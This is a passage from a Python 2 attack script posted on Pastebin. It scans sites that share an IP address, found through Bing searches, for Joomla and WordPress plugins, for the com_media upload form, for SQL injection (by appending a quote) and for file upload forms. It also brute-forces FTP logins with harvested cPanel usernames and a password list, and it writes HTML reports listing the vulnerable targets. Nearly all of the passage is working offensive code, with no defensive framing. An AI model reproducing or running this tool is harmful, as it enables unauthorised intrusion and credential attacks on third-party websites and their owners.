  853. jocheck = urllib2.urlopen(jo + "/" + str(link)).read()
  854. found = re.findall(str(name), jocheck)
  855. if found :
  856. print bcolors.FAIL + "|-> Found Joomla " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(jo)
  857. except :
  858. pass
  859. #-------------------------------------------------
  860. def check(site):
  861. try :
  862. ur = urllib2.urlopen(site + "/" + com_media_inj).read()
  863. check = re.findall('id="uploadForm" name="uploadForm" method="post" enctype="multipart/form-data">',ur)
  864. if check :
  865. print bcolors.FAIL + "|-> Com Media > " + site
  866. except :
  867. pass
  868. def com_mediascan():
  869. print bcolors.OKBLUE + "|================ Com Media ================| "
  870. for jo in jolist :
  871. check(jo)
  872. print bcolors.OKBLUE + "|================ Com Media ================| "
  873. #-------------------------------------------------
  874. def scanwp():
  875. print bcolors.OKBLUE + "|- Scanning Wordpress From most Known plugins"
  876. for wp in wplist :
  877. for link,name in wpt.iteritems() :
  878. currentcodetwo = urllib.urlopen(wp + "/" + str(link)).getcode()
  879. if currentcodetwo == 200 :
  880. print bcolors.FAIL + "|-> Found Wordpress Plugin " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(wp)
  881. #-------------------------------------------------
  882. def bing_check(ip):
  883. page = 1
  884. lista = []
  885. while page <= 101:
  886. try:
  887. bing = "http://www.bing.com/search?q=ip%3A" + ip + "+*.php&count=50&first=" + str(page)
  888. openbing = urllib2.urlopen(bing)
  889. readbing = openbing.read()
  890. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  891. for i in range(len(findwebs)):
  892. x = findwebs[i]
  893. urls.append(x)
  894. except:
  895. pass
  896.  
  897. page += 50
  898. def scanuplcheck() :
  899. print bcolors.OKBLUE + "|- Ready To check Upload From Crawled Urls"
  900. try :
  901. for url in unique(urls) :
  902. aa =urllib2.urlopen(url).read()
  903. bb = re.findall('type="file"',aa)
  904. if bb :
  905. print bcolors.FAIL + "|-> Upload From Crawl > " + url
  906. except :
  907. pass
  908. def scansqlicheck() :
  909. print bcolors.OKBLUE + "|- Ready To check sqli From Crawled Urls"
  910. try :
  911. for url in unique(urls) :
  912. aa =urllib2.urlopen(url + "'").read()
  913. bb = re.findall('SQL',aa)
  914. if bb :
  915. print bcolors.FAIL + "|-> sql Injection From Crawl > " + url
  916. except :
  917. pass
  918. def bruteftp(ip,user,password):
  919. try:
  920. ftp = FTP(ip)
  921. ftp.login(user, password)
  922. print (bcolors.OKGREEN + '|-> FTP Attacked with username ' + str(user) + ' And password is ' + str(password))
  923. ftp.quit()
  924. except:
  925. pass
  926. def attackftp(ip) :
  927. try :
  928. print bcolors.OKBLUE + "|- Brute Forcing Ftp "
  929. for user in cpusers :
  930. for password in passwords :
  931. bruteftp(ip,user,password)
  932. except :
  933. pass
  934. def showwp(ip):
  935. with open("reports/" + ip + '_report.html', 'a') as f:
  936. f.write('<center><font color="yellow" size=4>WORDPRESS </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  937. f.write('<center><textarea rows="10" cols="40">' )
  938. f.close()
  939. for wp in wplist :
  940. with open("reports/" + ip + '_report.html', 'a') as f:
  941. f.write(wp + "\n")
  942. f.close()
  943. with open("reports/" + ip + '_report.html', 'a') as f:
  944. f.write('</textarea>' )
  945. f.close()
  946. def showjo(ip):
  947. with open("reports/" + ip + '_report.html', 'a') as f:
  948. f.write('<center><font color="yellow" size=4>Joomla </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  949. f.write('<center><textarea rows="10" cols="40">' )
  950. f.close()
  951. for jo in jolist :
  952. with open("reports/" + ip + '_report.html', 'a') as f:
  953. f.write(jo + "\n")
  954. f.close()
  955. with open("reports/" + ip + '_report.html', 'a') as f:
  956. f.write('</textarea>' )
  957. f.close()
  958. def showad(ip):
  959. with open("reports/" + ip + '_report.html', 'a') as f:
  960. f.write('<center><font color="yellow" size=4>Admin Panel </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  961. f.close()
  962. for ad in adlist :
  963. with open("reports/" + ip + '_report.html', 'a') as f:
  964. f.write('<br><a href="' + str(ad) + '"><font color="blue" size="3">' + str(ad) + '</font></a><br>')
  965. f.close()
  966. def showsqli(ip):
  967. with open("reports/" + ip + '_report.html', 'a') as f:
  968. f.write('<center><font color="yellow" size=4>SQL Injection </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  969. f.close()
  970. for sq in sqlilist :
  971. with open("reports/" + ip + '_report.html', 'a') as f:
  972. f.write('<br><a href="' + str(sq) + '"><font color="blue" size="3">' + str(sq) + '</font></a><br>')
  973. f.close()
  974. def showupl(ip):
  975. with open("reports/" + ip + '_report.html', 'a') as f:
  976. f.write('<center><font color="yellow" size=4>Upload </font><font color="blue" size=4>SITES</font><font color="green" size=4></font></center>' )
  977. f.close()
  978. for up in upllist :
  979. with open("reports/" + ip + '_report.html', 'a') as f:
  980. f.write('<br><a href="' + str(up) + '"><font color="blue" size="3">' + str(up) + '</font></a><br>')
  981. f.close()
  982. def showc(ip):
  983. with open("reports/" + ip + '_report.html', 'a') as f:
  984. f.write('<center><font color="yellow" size=4>CP </font><font color="blue" size=4>USERS</font><font color="green" size=4></font></center>' )
  985. f.write('<center><textarea rows="10" cols="40">' )
  986. f.close()
  987. for u in cpusers :
  988. with open("reports/" + ip + '_report.html', 'a') as f:
  989. f.write(u + "\n")
  990. f.close()
  991. with open("reports/" + ip + '_report.html', 'a') as f:
  992. f.write('</textarea>' )
  993. f.close()
  994. #~~~~~~~~~~~~~
  995. def main(ip):
  996. del cpusers[:]
  997. del jolist[:]
  998. del wplist[:]
  999. del adlist[:]
  1000. del sqlilist[:]
  1001. del upllist[:]
  1002. del sites[:]
  1003. del jcelist[:]
  1004. del urls[:]
  1005. del wpconfigbak[:]
  1006. try :
  1007. ip = socket.gethostbyname(ip)
  1008. except :
  1009. pass
  1010. with open("reports/" + ip + '_report.html', 'a') as f:
  1011. f.write("<html>")
  1012. f.write(style)
  1013. f.write('<hr color="red">')
  1014. print bcolors.WARNING + "|-> Target : " + str(ip)
  1015. extractserver(ip)
  1016. grabwp(ip)
  1017. showwp(ip)
  1018. grabjo(ip)
  1019. showjo(ip)
  1020. admingrabber(ip)
  1021. grabadfs()
  1022. counta()
  1023. showad(ip)
  1024. grabsqli(ip)
  1025. count()
  1026. showsqli(ip)
  1027. grabupl(ip)
  1028. showupl(ip)
  1029. grabuploadedlink()
  1030. #~~~~~~~~~~~~~
  1031. for ip in ips :
  1032. ip = ip.rstrip()
  1033. main(ip)
  1034. #~~~~~~~~~~~~~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!